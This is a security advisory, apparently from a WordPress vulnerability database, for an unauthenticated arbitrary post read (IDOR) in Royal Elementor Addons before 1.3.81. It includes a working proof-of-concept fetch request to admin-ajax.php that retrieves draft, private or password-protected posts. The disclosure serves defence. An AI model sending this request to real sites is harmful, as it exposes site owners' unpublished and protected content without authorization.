WordPress Plugin Vulnerabilities
Royal Elementor Addons and Templates < 1.3.81 - Unauthenticated Arbitrary Post Read
Description
The plugin does not ensure that users accessing posts via an AJAX action (and REST endpoint, currently disabled in the plugin) have the right to do so, allowing unauthenticated users to access arbitrary draft, private and password protected posts/pages content
Proof of Concept
WooCommerce needs to be installed and activated. Then, run the below command in the developer console of the web browser while being on the blog as unauthenticated user (4 being the ID of a Draft, Private or Password protected post) (await fetch("/wp-admin/admin-ajax.php?action=wpr_get_page_content", { "headers": { "content-type": "application/x-www-form-urlencoded", }, "body": "wpr_compare_page_id=4", "method": "POST", })).text();
Affects Plugins
References
CVE
Classification
Type
IDOR
OWASP top 10
CWE
Miscellaneous
Original Researcher
Krzysztof Zając (CERT PL)
Submitter
Krzysztof Zając (CERT PL)
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-12-06 (about 5 months ago)
Added
2023-12-06 (about 5 months ago)
Last Updated
2023-12-06 (about 5 months ago)